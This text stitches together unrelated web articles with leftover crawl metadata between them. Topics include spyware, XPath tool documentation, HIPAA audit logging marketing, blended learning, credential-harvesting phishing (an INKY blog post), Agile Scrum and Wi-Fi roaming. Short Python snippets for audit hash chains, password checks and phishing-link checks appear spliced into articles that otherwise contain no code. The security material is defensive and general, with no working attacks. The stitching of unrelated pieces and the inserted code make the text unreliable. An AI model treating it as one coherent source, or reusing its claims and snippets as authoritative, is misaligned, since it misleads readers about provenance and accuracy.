If spyware gets installed on your computer, a third party (maybe a hacker, suspicious spouse, or advertising company) gets access to your data. They might have the ability to view anything from your browsing history to your personal photos to your online banking credentials.
In this article, we’ll look at what is and isn’t spyware, how it works, and how to remove it from your computer.
Spyware falls under the broader category of malware, or malicious software. In particular, any program that gathers your personal information and sends it to a third party is classified as spyware.
Many different types of cybercriminals use spyware. Sometimes, hackers trick lots of people into installing spyware to steal their credit card information or banking passwords. Other times, someone will install spyware on their husband’s or wife’s computer to confirm suspicions of cheating. The most nefarious kinds help commit identity theft, allowing criminals to impersonate victims to governments and banks.
Types of spyware
By definition, spyware is a program running on the victim’s computer, so hardware-based keyloggers don’t count. However, there are a lot of different kinds of spyware:
- System monitors, including keyloggers. These programs monitor the computer’s inputs and outputs for useful information. Keyloggers, the most common type, record every keystroke typed on the computer, including potentially sensitive passwords.
- Info-stealing spyware. Unlike keyloggers, these programs don’t indiscriminately record keystrokes. Instead, they convey specific information from the user’s computer to a third party. This kind of spyware frequently targets photos, browser history, password databases, and other sensitive information.
- Banking trojans. Multiple types of banking trojans exist, including some that aren’t spyware (like those that add fake buttons to banking websites). However, many of these malicious programs steal passwords to make unauthorized transactions. Advanced banking trojans combine these properties: they take the victim’s password, steal their money, and make it look like nothing happened.
- Rootkits. Regular malware runs on top of the operating system; rootkits run beneath it, evading detection and removal. Hackers sometimes combine rootkits with other types of malware.
- Employee monitoring software. While not usually nefarious, this kind of software is sometimes classified as spyware. It functions similarly to spyware created by criminals, although antivirus programs don’t generally flag it as malicious. Employee monitoring software may record users’ activity within certain applications, including web browsers.
- Logging VPNs. These VPNs monitor and sell their users’ Internet activity for advertising purposes. While they function like a legitimate service, they collect data that reputable VPN providers do not.
How does spyware work?
Like other malware, spyware usually arrives on a victim’s computer when they run a fake program (known as a Trojan horse), open email attachments from unknown senders, or allow someone else to access their computer.
Once spyware arrives on a victim’s computer, it will attract as little attention as possible. Since most spyware strives to steal information silently, any hint of its existence could be detrimental to its success. On occasion, however, spyware will combine with adware to display especially personalized advertisements.
From there, different kinds of spyware work somewhat differently:
- Keyloggers silently record everything that users type on the infected computer, relaying the information to the attacker or storing it in a file.
- Other types of system monitors relay all or some of the collected information to the attacker. Uploading everything displayed on the screen is prohibitively slow, so spyware utilizing this strategy must scan for important or sensitive information.
- Info-stealing spyware scans files for interesting or sensitive information, uploading only the highest-value data to avoid detection.
- Banking trojans compromise the victim’s web browser to access and modify their banking site. They may also contain a keylogger component to steal passwords.
Some spyware, like the kinds intended to surveil significant others and employees, usually gets deleted when the spouse or employer chooses to do so. That said, most spyware sticks around as long as possible to scoop up as much sensitive information as it can.
Examples of spyware
Compared to some types of malware (like ransomware), spyware has been around for a long time. As a result, spyware authors have created a lot of different varieties. You can see some of the most prominent here:
- CoolWebSearch arrived on victims’ computers, bundled with other malware, through a drive-by installation. In addition to spying on users’ activity and information, it forced the user to search the web through coolwebsearch[dot]com, showed pop-up ads (including some with pornographic content), and slowed down infected computers.
- Internet Optimizer was an older spyware and adware program which covered browser error pages in advertisements. Additionally, it stole its victims’ information.
- FinFisher is a highly professional, advanced spyware program used by law enforcement and government agencies. FinFisher customers can install it on targets’ computers in a variety of ways, including malicious emails and flaws in common software.
- Onavo Protect was a mobile app produced by a Facebook subsidiary that stole user information and sold it for advertising purposes. While not as nefarious as other kinds of spyware—in particular, Onavo could not read data sent on HTTPS-secured sites—it raised the ire of many security researchers.
How do I get spyware?
Spyware arrives through a variety of different channels, from infected Microsoft Office email attachments to fake download buttons in ads.
Some of the most common ways that people accidentally install spyware include the following:
- Installing a fake updater or installer for another program. Security researchers call these types of malicious programs Trojan horses.
- Opening email attachments or clicking on links in messages from unknown senders.
- Clicking “enable” or “allow” on pop-ups without reading them thoroughly.
- Not updating your operating system or important software in a timely manner, allowing hackers to exploit security vulnerabilities.
In many common cases, spyware comes bundled with other malware.
How to remove spyware
Back in the '90s and early 2000s, skilled computer users could realistically remove malware from their computers by hand. However, modern malware—especially sneaky varieties like spyware—is too hard to remove this way. Wiping and completely reinstalling your computer practically guarantees that any malware is removed, so most experts recommend this strategy today.
To effectively wipe your computer and remove spyware, try this approach:
- Make a complete backup of your important files.
- Using a clean computer, create a bootable recovery drive.
- On Windows, use Microsoft’s USB/DVD Download Tool.
- On macOS, boot from Recovery by holding down the Command and R keys.
- Reboot from the USB drive or internal recovery partition.
- Use the on-screen assistance to completely wipe (or format) your hard drive and reinstall your operating system.
- Reboot into your internal boot drive and follow the on-screen instructions to set up your computer like new.
- Install a trusted antivirus solution and scan your backup containing your most important files.
- If the files are marked clean, restore your backup by moving the files onto your newly cleaned computer.
How do I protect myself?
Most of the general suggestions for protecting yourself from malware also apply to spyware. Here are some of the most important recommendations:
- Don’t download files from untrustworthy sources, especially piracy sites.
- Avoid opening attachments or clicking links in emails from people you don’t recognize.
- Don’t fall for malicious advertisements like fake download buttons.
- Using an adblocker may be a good approach to avoid these ads.
- Lock your computer when leaving it unattended. If you’re especially paranoid, consider using full-disk encryption.
- Use an antivirus solution to proactively monitor your computer for signs of spyware and other malicious software.
- Keep your software up to date to avoid falling victim to security vulnerabilities. Pay special attention to your web browser and antivirus software.
- Stick to reputable VPNs to avoid having your Internet traffic logged and used for advertising.
Most importantly, always stay vigilant and skeptical of the websites you visit and the emails you receive.
XPath Generator Utility
The Sequences Generator Toolbar includes a utility that simplifies the task of generating an XPath expression to locate an element on a page. The tool generates the smallest XPath expression (i.e. the one referencing the minimum number of nodes and attributes) required to uniquely identify the element in the page. The resulting expression can be used with the ITPilot functions XPATH and XPATHLIST (see section Functions for Page Handling) or with the NSEQL command FindElementByXPath.
Open the tool by clicking the button.
To generate an XPath expression:
Type the URL of the page at the top of the wizard and press ENTER to load it. If the target element is not on the initial page, perform the required actions in the embedded browser to make it appear.
Click the “Start XPath generation” button. This puts the tool into a “generation mode” in which mouse actions on the browser control have no effect on the HTML page. If you need to perform browsing actions again, click “Stop XPath generation” to return to “browsing mode”.
Click the target element. It will be highlighted with a red rectangle. The component below the browser control displays the DOM route to the target element as a tree, and the generated expression is shown at the bottom of the wizard. Click any node of the tree to see its XPath expression.
The “Copy to clipboard” button copies the generated expression to the clipboard.
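To make the idea of a "smallest unique expression" concrete, here is a sketch using Python's standard-library ElementTree (purely illustrative; ITPilot evaluates the generated expression through its own XPATH/XPATHLIST functions or FindElementByXPath, not through Python):

```python
import xml.etree.ElementTree as ET

# A miniature page: the goal is the smallest expression that still
# uniquely identifies the target element (here, the price <span>).
page = """
<html>
  <body>
    <div id="products">
      <span class="name">Widget</span>
      <span class="price">9.99</span>
    </div>
    <div id="footer">
      <span class="name">Contact</span>
    </div>
  </body>
</html>
"""

root = ET.fromstring(page)

# "//span" is too broad: it matches three elements on this page...
all_spans = root.findall(".//span")

# ...but a single attribute predicate is already enough to be unique,
# so a generator would stop here rather than spell out the full path.
minimal = root.findall(".//span[@class='price']")

print(len(all_spans))   # 3
print(len(minimal))     # 1
print(minimal[0].text)  # 9.99
```

A generator following this strategy starts from a broad expression and adds nodes or attribute predicates only until exactly one match remains.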
The dark web refers to encrypted areas of the internet known for providing anonymity to their users. The dark web is a subset of the deep web. It is intentionally hidden, requiring a specific browser—Tor.
This part of the internet isn’t visible to search engines and requires the use of an anonymizing browser like Tor to be accessed.
Innovations in computer software and technology are often created with good objectives. Unfortunately, criminals rapidly employ novel technology to enhance prevailing criminal practices or produce new forms of crime. One of the state-of-the-art crime forms is the usage of cryptocurrency to execute transactions, mostly illegal ones, on the dark web.
Cybercrime has been a growing threat for decades, ever since the Internet became widespread. Some news reports suggest that nearly 80% of organizations in the USA were the victims of an online attack in 2020 alone. For this reason, you must understand what attackers online are capable of, so you can try to combat them.
What is HIPAA
HIPAA stands for the Health Insurance Portability and Accountability Act. HIPAA provides data privacy and security measures for safeguarding medical information such as biometric data and patient health history. It was signed into law in 1996 by President Bill Clinton. The act contains five titles covering:
- Prevention of group health plans from refusing to cover individuals who have pre-existing diseases or conditions, and prohibits them from setting limits for lifetime coverage
- Standardizing the processing of electronic healthcare transactions nation-wide
- Regulation of provisions that are tax-related, as well as general medical guidelines
- Health insurance reforms, including provisions for those who have pre-existing diseases or conditions, and individuals who are seeking continued coverage
- Regulation of provisions associated with company-owned insurance, and treatment of those who lost their citizenship for income tax reasons
To comply with the technical aspect of HIPAA, though, every US-based organization that handles data covered by the Act needs to make sure that it has taken appropriate technical measures to safeguard medical data.
Most Significant Health Data Breaches and Their Causes
Healthcare IT News reports that healthcare continued to be a lucrative target for hackers in 2018 with weaponized ransomware, misconfigured cloud storage buckets and phishing emails dominating the year. Cyber criminals, they say, will likely get more creative despite better awareness among healthcare organizations at the executive level for the funding needed to protect themselves.
Some of the most significant healthcare data breaches in 2018 are as follows:
|Year|Organization|Records Affected|Cause of data breach|
|---|---|---|---|
|2018|UnityPoint Health|1.4 million patient records|Phishing emails|
|2018|LifeBridge|500,000 patient records|Malware|
|2018|Oklahoma Medicaid|280,000 patient records|Database hacked|
Most significant health data breaches | Data aggregated from Healthcare IT News articles
The table shows that the most common data breach causes are related to poor database protection or poor IT security training of staff. Processes and procedures, on the other hand, provide clear guidelines on what steps to follow to minimize the risk of an information security breach, and how to proceed in case of a security incident.
Data integrity is another aspect that organizations often neglect. According to high-level security experts, “Data Integrity Is the Biggest Threat in Cyberspace”. Whether it’s an external or internal attack, the risk is there, and if you don’t discover that the integrity of your data has been compromised, you may not know there was an attack in the first place.
Putting all these measures together guarantees a proportionate level of data protection. Another aspect, however, is protecting the patient database so that it can’t be easily breached. To illustrate the main things every healthcare organization needs to consider, we compiled the guide below.
Main HIPAA IT Aspects
In terms of protecting sensitive personal data, certain access control measures should be taken by every organization that keeps medical records. Organizations are required to implement appropriate technical policies and procedures, and to secure physical and digital access to data. Electronic information systems that maintain electronic protected health information must allow access only to those persons or software programs that have been granted access rights.
The IT implementation of this requirement is related to three important aspects:
- Keeping an unmodifiable audit log for each access to sensitive data per profile. Logging who accessed which type of data and at what time helps investigations in case of a data breach. However, if logs can be deleted or modified by anyone within the organization (even a system admin, who also has access to various company assets), the logs themselves become a vulnerability. For this reason we created Sentinel Trails, a blockchain-based secure audit trail that makes data manipulation practically impossible.
- Real-time incident reporting. Real-time reporting allows managers and quality auditors to take full control over data access. They can keep an eye on the access logs and spot any anomalous behavior – e.g. who accessed sensitive data outside their work hours, who exported big data arrays without being supposed to, who made changes to the database, etc.
- Fraud detection. Anomalous activities can be detected automatically and alerts sent to responsible parties based on predefined rules – for example, accessing data outside work hours. This way the person responsible for quality assurance receives a phone/email notification when the alert rule is triggered and can investigate the issue in a timely manner.
Fraud Detection: Rule-based Alert Setup | Image Source: Sentinel Trails advanced dashboard menu
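The "unmodifiable audit log" requirement above can be illustrated with a hash chain, in which each entry's hash covers the previous entry's hash, so editing or deleting any record breaks verification. This is a minimal sketch of the tamper-evidence principle only; it is not LogSentinel's actual implementation, and the function names are invented for the example:

```python
import hashlib
import json

def append_entry(log, actor, action, timestamp):
    """Append an entry whose hash chains to the previous entry's hash."""
    prev_hash = log[-1]["hash"] if log else "0" * 64
    record = {"actor": actor, "action": action, "ts": timestamp, "prev": prev_hash}
    payload = json.dumps(record, sort_keys=True).encode()
    record["hash"] = hashlib.sha256(payload).hexdigest()
    log.append(record)
    return log

def verify(log):
    """Recompute every hash in order; any in-place edit is detected."""
    prev = "0" * 64
    for rec in log:
        body = {k: v for k, v in rec.items() if k != "hash"}
        if body["prev"] != prev:
            return False
        digest = hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()
        if digest != rec["hash"]:
            return False
        prev = rec["hash"]
    return True

log = []
append_entry(log, "dr_smith", "viewed patient 1042", "2019-03-01T02:14:00")
append_entry(log, "admin", "exported records", "2019-03-01T02:15:00")
print(verify(log))                # True
log[0]["actor"] = "someone_else"  # an insider tries to cover their tracks
print(verify(log))                # False
```

Production systems add secrets or external anchoring (e.g. a blockchain) on top of this, so an attacker cannot simply recompute the whole chain after tampering.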
To implement appropriate IT measures, first prepare an IT implementation plan covering the security measures that have not yet been implemented. To ensure quality, conduct an annual internal audit and take corrective and preventive measures based on its findings.
The following four IT aspects should be carefully reviewed and implemented in accordance with the needs of the organisation:
|Unique user identification|Emergency access procedure|Automatic logoff|Encryption & decryption|
|---|---|---|---|
|Assign a unique ID (name, number, combination of symbols) to identify and track user identity.|Establish procedures for obtaining necessary electronic protected health information during an emergency.|Make sure you have established procedures to terminate sessions after a predetermined time of device inactivity.|Encrypt and decrypt any protected health information (PHI).|
Make sure the database where you store PHI is also encrypted and that data transfers are secure.
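Of the four aspects, automatic logoff is the simplest to sketch in code. The session wrapper below is a hypothetical illustration (the class, method names, and the 15-minute timeout are assumptions for the example, not taken from the HIPAA text or from any specific framework):

```python
SESSION_TIMEOUT = 15 * 60  # seconds of inactivity before forced logoff (assumed)

class Session:
    def __init__(self, user, now):
        self.user = user
        self.last_activity = now

    def touch(self, now):
        """Call on every request; returns False when the session must end."""
        if now - self.last_activity > SESSION_TIMEOUT:
            return False  # expired: terminate session, require re-login
        self.last_activity = now
        return True

s = Session("nurse_jones", now=0)
print(s.touch(now=10 * 60))  # True: active again within the window
print(s.touch(now=40 * 60))  # False: 30 minutes idle, session terminated
```

A real deployment would enforce this server-side for every request and also lock the client screen, so an unattended workstation cannot expose PHI.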
HIPAA Audit Control and Audit Log Requirements
Once implemented, any PHI-related software, hardware and procedures should be carefully audited on a regular basis.
Audits ensure that the organisation is continually engaged with the protection of sensitive data, and demonstrates its responsibility to improve it. The audit control is important to demonstrate compliance with the HIPAA. But at the same time it is vital to ensure compliance with other data privacy-related regulations such as GDPR.
Audit logs can ensure a smooth audit process with minimum staff involvement. Audit logs provide useful and at the same time irreplaceable information about everyday processes, and help auditors get a better overview of the security measures taken, such as access granted.
Data integrity is key to HIPAA compliance. Implementing policies and procedures that protect electronic PHI from improper alteration or destruction can prevent various data breaches. Implementing electronic mechanisms to corroborate that electronic PHI has not been altered or destroyed in an unauthorized manner is also a must-have. The best-case scenario is developing an all-in-one overview where auditors and operations managers can review and verify that only authorized persons can access sensitive data.
Person or entity authentication
Implement procedures to verify that a person or entity seeking access to electronic PHI is authorized to receive it.
Make sure all the procedures and processes you implement are in line with your organisation policies. Also make sure that they are being audited on a regular basis.
Best practices for person/entity authentication guidelines include:
- Keeping an unmodifiable, time-stamped audit log in relation to each incoming PHI request
- Keeping an unmodifiable, time-stamped audit log in relation to who processed it
- Keeping an unmodifiable, time-stamped audit log that the request has been verified before processed
Data transmission is a potential information security gap. Transmitted data can easily become a target, so keeping it secure is a priority for every organisation, especially those keeping ePHI.
Certain integrity controls and encryption measures can reduce the data breach risk to minimum:
|Implement security measures to ensure that electronically transmitted PHI is not misused without detection until its disposal.|Implement a mechanism to encrypt electronic PHI whenever deemed appropriate.|
|---|---|
|Make sure you have set up certain event log alerts for tracking misuse.|Audit all your records where you store PHI and plan how to minimize it and keep it encrypted.|
How Can LogSentinel Secure Your Medical Data
LogSentinel’s business focus is keeping sensitive data safe, and making it easier to investigate who is responsible for a data breach event. We previously reviewed the most common practices to prevent various types of data breaches. But not every organisation has the capabilities to do this alone. That’s why we developed a 360-degree, compliance-as-a-service solution, helping small and medium organisations to solve their information security issues seamlessly.
Protection of PII and health records
We offer a ‘Privacy by Design‘ secure database. We encrypt every record individually, using a secure key hierarchy that makes data breach events practically impossible. SentinelDB can therefore be considered a HIPAA-compliant database.
Keeping unmodifiable logs of activity
Most data breach attempts are initiated by insiders.
Very often, insiders manage to cover their traces, making it impossible to trace who breached the data.
With SentinelTrails, your activity logs are kept safe on a blockchain, so no one can access your data without leaving evidence.
This feature fully covers the HIPAA audit log requirements.
Fraud and anomaly activity detection
Thanks to the advanced technology used in developing SentinelTrails, you can receive a real-time notification if anomalous activity is detected – e.g. access to PII outside of work hours.
Real-time alerts can help prevent highly sensitive data breach and save company reputation.
Take control over the sensitive data you own.
The real-time analytics give you an overview of the activity during the period you’ve chosen to observe.
Easy Integration. Zero maintenance.
Minimum effort is required from your side.
Our expert team will adapt our services to the exceptional requirements of your organization, so that you can focus on what’s actually important – saving lives.
If you would like to explore more about the information security solutions, contact us today.
Denitsa Stefanova is a Senior IT Business Analyst with solid experience in Marketing and Data Analytics. She is involved in IT projects related to marketing and data analytics software improvements, as well as the development of effective methods for fraud and data breach prevention. Denitsa applies her IT-related experience to her everyday duties, including IT and quality auditing, detecting IT vulnerabilities, and identifying GDPR-related gaps.
As it turns out, distracting little kids with bright computer screens may be the answer to maximizing their education. New models in use in California are showing how to successfully incorporate computers into elementary schools. Katherine Mangu-Ward wrote an August 7 article for Future Tense – a partnership of Slate, the New America Foundation and Arizona State University – that detailed a new blended learning environment in which classroom control goes back and forth between classroom management software designed specifically for young children and traditional teachers.
“Online learning appears to be a classic disruptive innovation with the potential not just to improve the current model of education delivery, but to transform it,” Heather Staker wrote in a May 2011 Innosight Institute report.
How it works
The model Mangu-Ward highlighted is a hybrid system. For example, a classroom of 30 students may have 15 computers. At any one time, half of the class will be at a computer and the other half will be taught by the teacher. Throughout the day, students rotate between learning from the teacher and the computer. This way, one teacher can more effectively manage a larger classroom.
“The common feature in the rotation model is that, within a given course, students rotate on a fixed schedule between learning online in a one-to-one, self-paced environment and sitting in a classroom with a traditional face-to-face teacher,” according to the Innosight Institute report. “It is the model most in between the traditional face-to-face classroom and online learning because it involves a split between the two and, in some cases, between remote and onsite. The face-to-face teacher usually oversees the online work.”
The classroom software used is optimized for both teachers and students. Teachers are able to track each child’s progress, and can offer more personalized guidance on specific topics. The software is also made with young students in mind, and includes features such as picture-based logins and talking cartoon animals to guide them through each lesson, according to Future Tense.
Schools that have implemented blended learning methods into classrooms have seen dramatic increases in test scores, according to the Knowledge is Power Program. Mangu-Ward wrote that she observed this technology improving classroom relations. She said computers allow for students to better communicate with and help out each other, while also receiving more face time from teachers over the course of a school year.
“[O]nline learning has the potential to be a disruptive force that will transform the factory-like, monolithic structure that has dominated America’s schools into a new model that is student-centric, highly personalized for each learner, and more productive,” Staker wrote.
Are children as young as five too young to learn from classroom management software? When is the best time for students to be first introduced to online learning? Leave your comments below to let us know what you think!
Bank robbers have to meticulously plan the perfect get-away. Burglars need to be careful that their DNA is not left at the scene of the crime. Car thieves must constantly dodge security cameras to avoid getting caught. Cybercriminals, on the other hand, must live relatively stress-free lives, considering their biggest worry is whether or not you’ll type in your password.
It’s called credential harvesting and it’s largely considered the foundation of email phishing. If you think about it, the easiest way for anyone to get into your secure files is by simply using your password. And, for many of us these days, we have a single sign-on (a.k.a. one password) that provides access to the bulk of our personal and company files.
Consider these terrifying password statistics:1
- 50% of people use the same password for all their logins.
- The most common password in the world is “123456”.
- The average password is eight characters or less in length
- Only 31.3% of internet users update their passwords once or twice a year.
- 9 out of 10 passwords are vulnerable to attack.
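To see why those numbers matter, even a few lines of screening logic catch the patterns listed above (the tiny password list and the 8-character cutoff here are illustrative only; real systems should check against large breach corpora and require multi-factor authentication):

```python
# A minuscule stand-in for the millions of known-breached passwords.
COMMON_PASSWORDS = {"123456", "password", "qwerty", "111111", "abc123"}

def password_is_weak(pw):
    """Flag passwords that are common or 8 characters or fewer."""
    return pw.lower() in COMMON_PASSWORDS or len(pw) <= 8

print(password_is_weak("123456"))                 # True: world's most common password
print(password_is_weak("pass"))                   # True: 8 characters or fewer
print(password_is_weak("correct-horse-battery"))  # False
```

Note that this only screens out the worst offenders; it says nothing about reuse across sites, which the statistics above show is at least as dangerous.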
Are you wondering how credential harvesting works?
Here are the basic steps:
- The hacker sends a phishing email.
In many cases, fear is used as a distracting motivator and the topic is something that the reader can relate to. Subjects might include an unpaid parking ticket, an invoice that’s past due, or how to access money that’s coming to you. Regardless, the sender will generally go to some lengths to make the email seem legitimate. Expect to see logos and important titles. There may also be a deadline in the message since we’re more apt to act without thinking if we’re rushed.
- You’re encouraged to click on a link and perform a task.
As mentioned above, you’re encouraged to act quickly in order to resolve some sort of issue. Honestly, this would be a good place to stop and reread the email. Since many credential harvesting schemes originate outside the U.S., chances are the phishing email has a number of flaws, including grammatical and spelling errors.
- The link takes you to a web page.
Much like the phishing email, the web page will look legitimate. The truth is, however, that one of the first steps a hacker has to take to set up these elaborate phishing schemes is to make a replica of a real website to draw you in even further. Unfortunately, behind what looks like a legitimate site, lurks a disguised IP address and the hacker’s server which detects and captures any secure information you type into the password fields.
- You’re tricked into entering your email address and password.
You’ll likely see a short message and be encouraged to sign in using your cloud-based company email address and password.
- The hacker retrieves your password from his server.
The webpage might be a clone of something legitimate, but the back end of it is set to send information right to the hacker.
- The hacker exploits your harvested credentials.
Once they have them, cybercriminals can use your harvested credentials in a number of ways including gaining access to anything from bank records to employer files and using your email to deceive those close to you into surrendering important company data or banking access. Or, your credentials can be sold on the dark web.
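Every step above depends on a link whose visible text claims one destination while the underlying href points at the hacker's server. A simple, illustrative mismatch check looks like this (the heuristic and the function name are our own invention for the example, not a feature of any particular product):

```python
import re
from urllib.parse import urlparse

def link_looks_suspicious(display_text, href):
    """Flag links whose visible text names one domain but point elsewhere."""
    shown = re.search(
        r"(?:https?://)?(?:www\.)?([a-z0-9.-]+\.[a-z]{2,})", display_text.lower()
    )
    if not shown:
        return False  # the text doesn't name a domain; nothing to compare
    actual = urlparse(href).hostname or ""
    return shown.group(1) not in actual

# Looks like a bank login, but actually points at the harvester's clone site:
print(link_looks_suspicious("https://www.mybank.com/login",
                            "http://203.0.113.7/mybank/login"))  # True
print(link_looks_suspicious("https://www.mybank.com/login",
                            "https://www.mybank.com/login"))     # False
```

Commercial email security tools apply far more signals than this (sender reputation, lookalike domains, page content), but the text/href mismatch remains one of the clearest red flags a recipient can check by hovering over a link.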
Now, if you think credential harvesting couldn’t happen to you, consider the fact that a business falls victim to a ransomware attack every eleven seconds.1 This is especially true in the U.S., which has millions more reported cybercrimes than any other country.2 In 2021 alone, the FBI reported $6.9 billion in losses with phishing attacks being the top culprit.2 It might even make you wonder where these cybercriminals are coming from. Well, sadly, becoming a hacker or cyber thief is easier than you think. In fact, there are plenty of blog posts and online videos that attempt to teach the average Joe how to set up their own successful credential harvesting scheme. That alone should tell you two things — first, more people than you realize (at all skill levels) could be attempting this type of email phishing scheme. And, secondly, you should take the steps now to protect yourself, your employees, and your company. The best way to start is by using two-factor authentication for your logins, and also consider the many benefits of hiring a third-party email security expert to uncover these types of credential harvesting threats before they wreak havoc on your business.
INKY can protect you from becoming a victim of credential harvesting. A cloud-based email security platform, INKY proactively and instantly scans inbound, internal, and outbound emails to eliminate phishing and malware. INKY's patented technology sanitizes all emails, detects foul play, disarms phishing emails, and reconstructs each email using safe and standard HTML5. From there, INKY’s Email Assistant injects a user-friendly HTML banner with one or more of nearly 60 warning messages to educate the recipient with specifics of the threat. With INKY, you can even report a phishing email with a click, from any device or email client. Request a demo of INKY today.
Learn more about credential harvesting and see how INKY caught an attempted harvester posing as the Department of Justice: Read INKY's Special Report on Credential Harvesting.
INKY is an award-winning, cloud-based email security solution developed to proactively eliminate phishing emails and malware while simultaneously providing real-time assistance to employees handling suspicious emails so they can make safer decisions. INKY’s patented technology incorporates sophisticated computer vision, machine learning models, social profiling, and stylometry algorithms to effectively sanitize emails, rewrite malicious links, detect and block security threats, mitigate sender impersonation, and more. Cost-effective and powerful, the INKY platform was developed for mobile-first IT organizations and works seamlessly on any device, operating system, and mail client. Learn more about INKY™ or request an online demonstration today. | <urn:uuid:ac47050e-1138-462c-822d-e2a62678b1bd> | CC-MAIN-2022-40 | https://www.inky.com/en/blog/credential-harvesting-virtually-hijacking-your-employees-credentials-2022 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337529.69/warc/CC-MAIN-20221004215917-20221005005917-00714.warc.gz | en | 0.930529 | 1,288 | 2.8125 | 3 |
WHAT IS AGILE SCRUM ENVIRONMENT?
As a set of values and principles that describes a group's day-to-day interactions and activities, Agile provides the framework for an iterative and incremental software development approach. Scrum is one of the implementations of the Agile methodology, laying out certain software development practices in more prescriptive and specific terms.
Widely used by software development teams, Scrum is believed to be the most popular Agile methodology. Scrum is ideal for projects where requirements are rapidly changing, which is often the norm. Characterized by frequent incremental builds and releases, the benefits of Scrum include higher productivity, better quality products, better team dynamics, and reduced time to market.
Although initially developed for Agile software development and the management of complex projects in a rapid delivery, team-based environment, Agile Scrum has become a preferred framework for Agile project management in general and is sometimes simply referred to as Scrum project management or Scrum development. | <urn:uuid:6c91c834-a773-4031-97c2-2b2bd3f5f8e4> | CC-MAIN-2022-40 | https://www.contrastsecurity.com/glossary/scrum?hsLang=en | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337731.82/warc/CC-MAIN-20221006061224-20221006091224-00714.warc.gz | en | 0.932962 | 207 | 2.8125 | 3 |
Teacher Training and Blended Learning Success
Blended learning, where students split their time between in-class lessons and online work, has become increasingly popular in K-12 education due to its success. Unsurprisingly, researchers found that blended learning was much more successful when the teacher had received proper and thorough training and support. What’s more, they had the support from schools and districts to aid their learning, too.
A recent report found that blended learning transformed teaching practices for 43 percent of teachers surveyed, while 44 percent said that the same tech has improved their students’ performance. The teachers also noted that their schools were at least offering some formal support for blended technology. Unfortunately, their peers who indicated that technology hasn’t changed their classroom for the better didn’t receive the same amount of support.
Although blended learning reimagines teaching and has successful results, schools should know that it comes as an investment. Teachers need to be correctly trained, and many schools often aren’t prepared for the investment of time and teacher training to turn a traditional classroom into a blended one. In addition, the lack of investment in quality technology and infrastructure led to challenges in implementing blended learning.
For some schools, not having enough devices for each student made it difficult to complete online activities on time. Other schools said that they had to prepare two lesson plans, just in case their Internet connection went down.
Schools can benefit from implementing modern technology into the classroom. To help protect your ever-evolving school, contact D&D Security by calling 800-453-4195 or by clicking here. | <urn:uuid:0103fb5d-844b-407b-a556-90bc296050ed> | CC-MAIN-2022-40 | https://ddsecurity.com/2018/01/25/pd-planning-tech-investments-learning-success/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338213.55/warc/CC-MAIN-20221007143842-20221007173842-00714.warc.gz | en | 0.985951 | 328 | 2.75 | 3 |
Filters control how frames are processed and captured.
The frame processing pipeline
This figure shows the functional blocks in the frame processing pipeline.
The frame passes through a number of functional blocks. Each block is controlled by a recipe. For example, the Color block can contribute to the "color" value of the frame, the Slicing block can cut out parts of the frame, and the Packet Descriptor block will attach a packet descriptor with relevant information about the frame. The last functional block, the Queue Manager, decides which stream will receive the frame.
The recipes are specified by filters, described below. If no filters are defined, all functional blocks will execute their default recipe. For example, the default recipe for the Queue Manager will drop the frames.
Each filter consists of a filter expression and a number of recipes.
A filter expression is a combination of protocol, IP match, port and various other tests.
- Color assignment
- Hash key calculation
- IP fragment handling
- Packet descriptor building
- Distribution to streams (queue management)
When a frame is received, all functional blocks are reset to their default recipe.
The frame is then presented to each filter in reverse priority order (the filter with the lowest priority is consulted first). If the frame matches the filter expression, the associated recipes are copied to the relevant functional blocks, replacing the recipes already there. This way, a higher priority filter overrules the behavior specified by a lower priority filter.
When all filters have been consulted, the frame is run through the functional blocks.
In effect, each resulting function recipe (including distribution to streams) can be picked from a different filter.
Filters are specified using the Assign NTPL command. Each Assign command specifies a new filter. Recipes are specified as options to the Assign commands.
In the following example, frames with length greater than or equal to 1000 bytes are processed using recipes from two different filters.
Assign[StreamId = 1; Priority = 20; Slice = Layer4Header] = Length >= 300 Assign[StreamId = 2; Priority = 10] = Length >= 1000
Filter 1 matches all frames with length greater than or equal to 300 bytes. Filter 2 matches all frames with length greater than or equal to 1000 bytes. Suppose a frame with a length of 1000 bytes is received. Both filters will match with filter 2 having the highest priority. Because filter 2 has the highest priority and it defines a StreamId recipe, the frame will be sent to stream 2. Filter 2 does not define a Slice recipe; however filter 1 does, and because it is the next highest priority filter that also matches the frame, the frame is sliced according to filter 1's Slice recipe. | <urn:uuid:6f2d78ab-6221-4de1-b3f1-9828a863c255> | CC-MAIN-2022-40 | https://docs.napatech.com/r/Feature-Set-N-ANL9/Introduction | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00114.warc.gz | en | 0.881599 | 582 | 2.8125 | 3 |
One extremely beneficial aspect of Wi-Fi networks is mobility. For example, a person can walk through a facility while carrying on a conversation over a Wi-Fi phone or downloading a large file from a server. The Wi-Fi radio inside the user device automatically roams from one access point to another as needed to provide seamless connectivity. At least, that’s what we hope will happen!
In the past, I’ve experienced issues with roaming, so I decided to perform some testing to get an inside view of what’s really happening. I was especially curious about how fast roaming actually works, and whether or not it’s disruptive to wireless applications.
My test configuration included two standard access points, with one access point (AP-1) set to channel 1 and the other access point (AP-2) set to channel 6. Other settings were default values, such as beacon interval of 100 milliseconds, RTS/CTS disabled, etc. The access points were installed in a typical office facility in a manner that provided a minimum of 25dB signal-to-noise ratio throughout each access point’s radio cell, with about twenty percent overlap between cells. This is somewhat the industry standard for wireless voice applications. The roaming client in my case, though, was a laptop equipped with an internal Intel Centrino Wi-Fi radio (Intel 2915ABG).
While standing with the wireless client within a few feet of AP-1, I used AirMagnet Laptop Analyzer (via another Wi-Fi card inserted into the laptop’s PC Card slot) to ensure that that I was associated with AP-1. I then kicked off an FTP transfer of a large file from the server to the laptop and started measuring the 802.11 packet trace using AirMagnet. With the file downloading throughout the entire test, I walked toward AP-2 until I was directly next to it. With the packet trace, I was able to view the exchange of 802.11 frames, calculate the roaming delay, and see if there was any significant disruption to the FTP stream.
Once the client radio decided to re-associate, it issued several 802.11 disassociation frames to AP-1 to initiate the re-association process. The radio then broadcast an 802.11 probe request to get responses from access points within range of the wireless client. This is likely done to ensure that the client radio has up-to-date information (beacon signal strength) of candidate access points prior to deciding which one to re-associate with.
